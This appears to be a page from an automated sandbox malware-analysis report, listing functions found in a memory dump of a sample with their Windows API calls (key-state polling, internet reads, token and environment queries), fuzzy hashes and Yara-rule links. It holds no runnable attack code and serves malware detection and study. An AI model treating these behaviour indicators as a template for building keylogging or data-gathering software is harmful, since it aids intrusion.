GetAsyncKeyState.USER32 ref: 00A0919D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 405a10a8e062aa0ddaa5225d3ecff5be65f67a3ea40a8ab9c849137f8271536d
Instruction ID: c25644ec44a00899c3f4a853d6a7c75c2c0d4c026436041bb25212e6902b88c0
Opcode Fuzzy Hash: 405a10a8e062aa0ddaa5225d3ecff5be65f67a3ea40a8ab9c849137f8271536d
Instruction Fuzzy Hash: 98415E75A0860AFBDF159F68D844BFEB774FF45320F208315E429A62E1C7306950CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A63874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00A638CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A63922
TranslateMessage.USER32(?), ref: 00A6394B
DispatchMessageW.USER32(?), ref: 00A63955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A63966

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 747be319d2554b0671dc1c7b97e457b1edb488061b129b372336cad0ba826e57
Instruction ID: 04654d6edc2fb72b65d2a082f00c117747faf3e57cc8c3da689407c2a1b3de32
Opcode Fuzzy Hash: 747be319d2554b0671dc1c7b97e457b1edb488061b129b372336cad0ba826e57
Instruction Fuzzy Hash: 513186736043469EEF25CB749868FB637B8EB06304F540569E462861A1E7B49A87CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00A6CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00A6CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 00A6CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,00A6C21E,00000000), ref: 00A6CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,00A6C21E,00000000), ref: 00A6CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,00A6C21E,00000000), ref: 00A6CFF2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 71101abad4f667dbbb22f168b839b0741d32cb28f628028460b411860bdd3650
Instruction ID: 8f0b5aed080027aa59ef651355dc11a97ceb92fc47a6f51b48003047f3512068
Opcode Fuzzy Hash: 71101abad4f667dbbb22f168b839b0741d32cb28f628028460b411860bdd3650
Instruction Fuzzy Hash: 08315C71600309EFDB20DFA5D984ABBBBF9EB14364B10442EF556E2141EB30AE41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A51901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A51915
PostMessageW.USER32 ref: 00A519C1
Sleep.KERNEL32(00000000,?,?,?), ref: 00A519C9
PostMessageW.USER32 ref: 00A519DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A519E2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e845aeb750b90f99a086249a317bb7eefb84f1798863d8ebe4c63ca40062dbf4
Instruction ID: 0c2353c16d9b58a62a243e048dde7f2ea551fff5e3a9a728987d04de2bdd2dd4
Opcode Fuzzy Hash: e845aeb750b90f99a086249a317bb7eefb84f1798863d8ebe4c63ca40062dbf4
Instruction Fuzzy Hash: 7F319E71A00219EFCB00CFA8C999BAE7BB5FB44325F104229FD21A72D1D7709948CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A85706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A85745
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A8579D
_wcslen.LIBCMT ref: 00A857AF
_wcslen.LIBCMT ref: 00A857BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A85816

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: e0fce8f4a6c422b86ce91bc991163073d64d14240a668d36d75c5b61e9f7fbb2
Instruction ID: 8c30b50e24bd148deaa4793b8866d20fba6d0d0c3cb5f1adcf46053ea8f513d8
Opcode Fuzzy Hash: e0fce8f4a6c422b86ce91bc991163073d64d14240a668d36d75c5b61e9f7fbb2
Instruction Fuzzy Hash: D2218575D046189ADB20EFB4CC85AEDB7B8FF04724F108626ED29EA190D7748985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A70930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A70951
GetForegroundWindow.USER32 ref: 00A70968
GetDC.USER32(00000000), ref: 00A709A4
GetPixel.GDI32(00000000,?,00000003), ref: 00A709B0
ReleaseDC.USER32(00000000,00000003), ref: 00A709E8

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 72f0d19b2aa5743a7ac38d6ea3940376c0f5c4b1a63e05843918006a3d707c3a
Instruction ID: 642f1aca76b730a2672537ebabaab0039e88db28e30c43f9bbf35eb6bb31f01b
Opcode Fuzzy Hash: 72f0d19b2aa5743a7ac38d6ea3940376c0f5c4b1a63e05843918006a3d707c3a
Instruction Fuzzy Hash: 0F216D75600204AFD704EFA5D998AAEBBF9EF48710F048078F95A97362DB30AC05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A2CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A2CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A2CDE9

Part of subcall function 00A23820: RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A2CE0F
_free.LIBCMT ref: 00A2CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A2CE31

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f9b522381f77b60a8c930db42514d2d494a3a137ca48b13cb6097e438ad0595f
Instruction ID: 64e3cc04ad0c1e7a1420576441ef0709f9b7f92f79124e1513d09c92f329b145
Opcode Fuzzy Hash: f9b522381f77b60a8c930db42514d2d494a3a137ca48b13cb6097e438ad0595f
Instruction Fuzzy Hash: 3601D4726016357FA32157BE7C8CD7F696DDEC6BB13160239F905C7200EA718D0286B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A09639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00A09693
SelectObject.GDI32(?,00000000), ref: 00A096A2
BeginPath.GDI32(?), ref: 00A096B9
SelectObject.GDI32(?,00000000), ref: 00A096E2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 34b234f394c00372be7897c3daa5a53c8c1ee40f75264c560216f582c8f20641
Instruction ID: 097744767b1a9a704a4c80cc5407de60c759ed5088730bf457a39cb23e6a3063
Opcode Fuzzy Hash: 34b234f394c00372be7897c3daa5a53c8c1ee40f75264c560216f582c8f20641
Instruction Fuzzy Hash: 48215075902309EBDB11DFA4FC58BAA3BB8BB51765F110216F410A71F2D3719892CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A0990C Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00A098CC
SetTextColor.GDI32(?,?), ref: 00A098D6
SetBkMode.GDI32(?,00000001), ref: 00A098E9
GetStockObject.GDI32(00000005), ref: 00A098F1
GetWindowLongW.USER32(?,000000EB), ref: 00A09952

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 9ae014cddebb1d0756845ad44e7488f2bf0518fcda2baeeca36554993d0e332f
Instruction ID: 78ec6071a105aad37f00e5ce1edc3d97f06f158539d826bdf1a8d8af887b9b22
Opcode Fuzzy Hash: 9ae014cddebb1d0756845ad44e7488f2bf0518fcda2baeeca36554993d0e332f
Instruction Fuzzy Hash: 532124312453949FCB228F74FC98EEB3B60AF53371B19425AE9928A5F3C7344846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A55711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00A55726
_memcmp.LIBVCRUNTIME ref: 00A55744
_memcmp.LIBVCRUNTIME ref: 00A55757
_memcmp.LIBVCRUNTIME ref: 00A5576F
_memcmp.LIBVCRUNTIME ref: 00A55787

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fbb42df2ec5e841a6740844343ad0cb0ae5502f1282578b3656ea5d5d71ea7cc
Instruction ID: 1ae236239da2160680807a2cebcf6418498b95c91a24328e92bd013864b4347c
Opcode Fuzzy Hash: fbb42df2ec5e841a6740844343ad0cb0ae5502f1282578b3656ea5d5d71ea7cc
Instruction Fuzzy Hash: E801B9B1A41609BFD2086621DE52FFB735DBF25395F104820FE14AE241F770EE5483A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A22DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00A1F2DE,00A23863,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6), ref: 00A22DFD
_free.LIBCMT ref: 00A22E32
_free.LIBCMT ref: 00A22E59
SetLastError.KERNEL32(00000000,009F1129), ref: 00A22E66
SetLastError.KERNEL32(00000000,009F1129), ref: 00A22E6F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 69e541c3fa4f59d0b7f0fb5e1ccf4fb8ef288cb47cb1bd4a7fd7afd53ae7a1cd
Instruction ID: 77eb24f4512617732263a7e4e68bc464097ace33c59cd470f1c8deffafa12292
Opcode Fuzzy Hash: 69e541c3fa4f59d0b7f0fb5e1ccf4fb8ef288cb47cb1bd4a7fd7afd53ae7a1cd
Instruction Fuzzy Hash: DC01F4322056307BC612A7BC7D46F7B2A6DEBD53B1B260138F821A21D3EA74CC026720

Uniqueness

Uniqueness Score: -1.00%

Function 00A5000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00A5002B
ProgIDFromCLSID.OLE32(?,00000000), ref: 00A50046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A4FF41,80070057,?,?), ref: 00A50054
CoTaskMemFree.OLE32(00000000), ref: 00A50064
CLSIDFromString.OLE32(?,?), ref: 00A50070

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: cf077018a5522a414ec174e9ed37449ab1b633df1613a8e6b56c741e101cec43
Instruction ID: b221b42cadba59bc9e155fb29959e8849b0332765201d3442ad8e28c970dfa31
Opcode Fuzzy Hash: cf077018a5522a414ec174e9ed37449ab1b633df1613a8e6b56c741e101cec43
Instruction Fuzzy Hash: 84018B72600204BFDB108FA8DC04FAA7AADFB447A3F144124FD05D6250E771DD458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00A5E997
QueryPerformanceFrequency.KERNEL32(?), ref: 00A5E9A5
Sleep.KERNEL32(00000000), ref: 00A5E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 00A5E9B7
Sleep.KERNEL32 ref: 00A5E9F3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 094c3c370fb1537e3c004ab8cddf2d04b9c066055069fe27afefe852ec8555b2
Instruction ID: d3343948f3aafcbdf25a1636c0a017056cfede9c7e462d69c4f904ca3b842193
Opcode Fuzzy Hash: 094c3c370fb1537e3c004ab8cddf2d04b9c066055069fe27afefe852ec8555b2
Instruction Fuzzy Hash: 53011731C01629DBCF04EBE5DD99AEDFB78BB09712F000656E912B2251DB309659CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A510F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A5112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A5114D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 5594975a53a501adf8dd66bfd9e5491bb54d8fafd517f0decdf3e0ca6e04fe9a
Instruction ID: 810e14c3bba974061650dd87fd6730ac89419a2871308b1cfe5034ebc7c1176c
Opcode Fuzzy Hash: 5594975a53a501adf8dd66bfd9e5491bb54d8fafd517f0decdf3e0ca6e04fe9a
Instruction Fuzzy Hash: 9C014279600605BFDB118BA4EC89A6A3B6EFF893A5B210468FA41C6260DB31DC018F70

Uniqueness

Uniqueness Score: -1.00%

Function 00A50FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A50FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A50FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A50FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A50FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A51002

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3cb232d4e3ee6b7da27d717b3d244386375a7a5d1ceddf844af987b2a28c0ec9
Instruction ID: 6555546aeadf6e67eefe4ed178dd22b27db900f95a6bd35fdef28817a5c17a55
Opcode Fuzzy Hash: 3cb232d4e3ee6b7da27d717b3d244386375a7a5d1ceddf844af987b2a28c0ec9
Instruction Fuzzy Hash: 50F04935201311ABDB218FE4AC8DF663BADFF89762F504424FA46CA291CA70DC418F70

Uniqueness

Uniqueness Score: -1.00%

Function 00A51014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A5102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A51036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A5104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51062

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d86f0a832f5136a78e5d4cde42d3b6c4e1ee1d4735ec0186b283405949e198c5
Instruction ID: 5f49380c973f61a4cb39dba79d648ac51b7829e71aea6cb3cf2816d5394f78f1
Opcode Fuzzy Hash: d86f0a832f5136a78e5d4cde42d3b6c4e1ee1d4735ec0186b283405949e198c5
Instruction Fuzzy Hash: EBF04935200311ABDB219FE4EC89F663BADFF89762F600424FA45CA290CA70D8418F70

Uniqueness

Uniqueness Score: -1.00%

Function 00A6030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00A60324
CloseHandle.KERNEL32(?), ref: 00A60331
CloseHandle.KERNEL32(?), ref: 00A6033E
CloseHandle.KERNEL32(?), ref: 00A6034B
CloseHandle.KERNEL32(?), ref: 00A60358
CloseHandle.KERNEL32(?), ref: 00A60365

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8635955aa65b08e81bf1b72e8c13b635a5335458b04b87d1284b146d0a5f1b8a
Instruction ID: 091a529bfe2460fb3cec36a274892c407999aaa94425d9ef3e0f6bc6edbf40ff
Opcode Fuzzy Hash: 8635955aa65b08e81bf1b72e8c13b635a5335458b04b87d1284b146d0a5f1b8a
Instruction Fuzzy Hash: E0019072800B159FC7319F66D880813F7F5FE502163158A3ED19656A31C371A995DF80

Uniqueness

Uniqueness Score: -1.00%

